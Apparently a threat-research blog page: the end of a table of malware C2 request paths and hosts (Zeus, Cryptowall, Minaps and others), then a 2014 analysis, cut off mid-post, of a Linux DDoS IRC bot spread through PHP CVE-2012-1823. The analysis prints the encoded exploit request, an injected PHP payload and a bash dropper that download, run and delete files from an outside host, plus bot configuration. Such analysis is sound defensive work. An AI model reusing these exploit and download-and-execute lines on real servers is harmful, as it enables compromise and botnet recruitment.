<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME / APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME / APT</span></td><td data-sheets-value="[null,2,"Lostdoor RAT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Lostdoor RAT</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\cmd.exe|2:13:42"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">INFO||LostDoor-001|Remote PC|| Windows XP Professional|<time>|511.56 MB|No|C:\\\\WINDOWS\\\\system32\\\\cmd.exe|2:13:42</time></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Protux worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Protux worm</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"\" http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 \n http://202.71.136.14:80/ggBwkFNqDu1869.avi\n /newTroy.jpg\" \n /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">" http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 <br /> http://202.71.136.14:80/ggBwkFNqDu1869.avi<br /> /newTroy.jpg" <br /> /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Conficker / Kido worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Conficker / Kido worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ ip checking services"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ ip checking services</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dingu / Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dingu / Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /1.jpg\n http://webemail.bounceme.net:8080/directget42.gif"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /1.jpg<br /> http://webemail.bounceme.net:8080/directget42.gif</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1/manualec.pdf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1/manualec.pdf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ycJ2Jj7r4t3wc6y4/ali.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ycJ2Jj7r4t3wc6y4/ali.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/tpnofu223t8h8dl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tpnofu223t8h8dl</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2," /4175iq691v3l \n GET /raw <ip-addr.es>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /4175iq691v3l <br /> GET /raw <ip-addr .es=""></ip-addr></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Galapoper / Tibs Downloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Galapoper / Tibs Downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /pic/tool.jpg\n /pic/search.jpg\n /pic/tibs.jpg\n /pic/proxy.jpg\n /pic/winlogon.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /pic/tool.jpg<br /> /pic/search.jpg<br /> /pic/tibs.jpg<br /> /pic/proxy.jpg<br /> /pic/winlogon.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Wykcores"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Wykcores</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /279843 \n /279859\n /280015\n /287171\n /315171\n /110937\n /111968\n /113000\n /114031\n /115062"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /279843 <br /> /279859<br /> /280015<br /> /287171<br /> /315171<br /> /110937<br /> /111968<br /> /113000<br /> /114031<br /> /115062</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"ADV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">ADV</span></td><td data-sheets-value="[null,2,"Ads - Zenovia Digital Exchange (not necessarily malicious)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Ads - Zenovia Digital Exchange (not necessarily malicious)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"EsFury worm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EsFury worm</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA\nhttp://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA<br />http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PornoAsset / LockEmAll Ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PornoAsset / LockEmAll Ransomware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/a.php?f=647&e=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/a.php?f=647&e=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"FakeAV Privacy Center"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">FakeAV Privacy Center</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /dfgsdfsdf.php\n /mf.php\n /css/new-mobile.css\n /js/wsjs.js\n /js/caf.js"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /dfgsdfsdf.php<br /> /mf.php<br /> /css/new-mobile.css<br /> /js/wsjs.js<br /> /js/caf.js</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus V2 (drop zone, config)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus V2 (drop zone, config)</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2," /panel3/gotobank.php \n /panel3/ppnl3.exe\n /panel3/ppnl3.bin\n /ppnl3.bin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /panel3/gotobank.php <br /> /panel3/ppnl3.exe<br /> /panel3/ppnl3.bin<br /> /ppnl3.bin</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blathla / Cadro adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blathla / Cadro adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1.gif"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1.gif</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo / Krap"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo / Krap</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vundo / Krap"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vundo / Krap</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"VOlk bot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">VOlk bot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1\nUser-Agent: vb wininet\nHost: portalcinemark.us"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1<br />User-Agent: vb wininet<br />Host: portalcinemark.us</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Oficla / Sasfis"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Oficla / Sasfis</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /21/download.php?expid=0&fid=1\n /s/download.php?expid=4&fid=1\n /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3\n /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3\n /np/load.php?spl=hcp&b=ff&o=xp&i=hcp\n /phpbb/image2/cp.php?i=15"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /21/download.php?expid=0&fid=1<br /> /s/download.php?expid=4&fid=1<br /> /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3<br /> /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3<br /> /np/load.php?spl=hcp&b=ff&o=xp&i=hcp<br /> /phpbb/image2/cp.php?i=15</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Pingbed"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Pingbed</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/default.htm\n/default1.htm\n/default2.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/default.htm<br />/default1.htm<br />/default2.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Minaps backdoor"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Minaps backdoor</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2," /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko\n /download/logo.png \n /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A\n POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko<br /> /download/logo.png <br /> /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A<br /> POST 
/download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"QHost / Orsam / Bicololo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">QHost / Orsam / Bicololo</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/stat/tuk/183"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/stat/tuk/183</span></td></tr>
</tbody></table>
<div>
</div>
</div>
</div>
Mila Parkour (http://www.blogger.com/profile/05026389826489033821)

Another Linux DDoS bot via CVE-2012-1823 (2014-07-08)
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
If you run a web server, you should be very familiar with the PHP vulnerability classified as <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823" target="_blank">CVE-2012-1823</a>. Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string. Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot. </div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
Our friends at <a href="http://malwaremustdie.org/" target="_blank">MalwareMustDie</a> have recently put up <a href="http://blog.malwaremustdie.org/" target="_blank">several excellent posts</a> discussing Linux malware, particularly dealing with DDoS. While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up. We like to study and track these variants and infrastructures, as well as the payloads that are being injected. In this case, one particular payload caught our eye.</div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br clear="none" /></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
The exploit attempt we observed arrived as the following URL-encoded request:</div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 188</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Content-Type: application/x-www-form-urlencoded</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">Host: -h</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;"><br />
</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;">When decoded, the actual request line is:</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14px; line-height: 1.428571em; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXqHdmZxMYN8yL6-sFQRJdJJKiVs9IdEEEHJunn7s_TYAbso7Vvqj8cA0sAYsYaxoWzsyZ-_qnhynTywcGoHtYqKkxyW1lKpklFL9qfH_KbXHN6vRwvMkfAHoszCa4uVvdsgnmLxQ4rL8/s1600/CVE-2012-1823.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXqHdmZxMYN8yL6-sFQRJdJJKiVs9IdEEEHJunn7s_TYAbso7Vvqj8cA0sAYsYaxoWzsyZ-_qnhynTywcGoHtYqKkxyW1lKpklFL9qfH_KbXHN6vRwvMkfAHoszCa4uVvdsgnmLxQ4rL8/s1600/CVE-2012-1823.jpg" height="86" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decoded CVE-2012-1823 exploit attempt</td></tr>
</tbody></table>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;">Upon successful compromise, the attacker injects the following:</span></div>
<div style="border: 0px; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif;"><br />
</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="color: orange; font-family: Courier New, Courier, monospace;"><? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?></span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;"><br />
</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;">"seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed":</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 19.9999942779541px;"><br />
</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<span style="color: orange;">#!/bin/bash</span></div>
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<span style="color: orange;">cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun</span></div>
<div style="border: 0px; font-family: 'Courier New', Courier, monospace; font-size: 14px; line-height: 19.9999942779541px; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
This script instructs the compromised server to fetch 'index.htm' from http://<span style="line-height: 1.428571em;"><redacted></span>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2". This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team". <span style="line-height: 1.428571em;">A copy of this popular IRCBot can be found at this </span><a href="http://pastebin.com/CJpxW5tx" style="line-height: 1.428571em;" target="_blank">PasteBin link</a><span style="line-height: 1.428571em;">.</span></div>
<div style="border: 0px; font-family: Helvetica, Arial, 'Droid Sans', sans-serif; font-size: 14px; line-height: 1.428571em; margin: 0px; padding: 0px;">
<br /></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-family: Helvetica, Arial, Droid Sans, sans-serif;"><span style="font-size: 14px; line-height: 19.9999942779541px;">Some of the configuration variables for the version of IrcBot dropped on our honeypots include:</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">$server = 'antiq.scifi.ro'</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">$server = 'antiq.evils.in'</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @admins = ("AnTiQ","deathy","Vasy");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<span style="font-size: 14px; line-height: 19.9999942779541px;"><span style="font-family: Courier New, Courier, monospace;">my @channels = ("#vnc");</span></span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
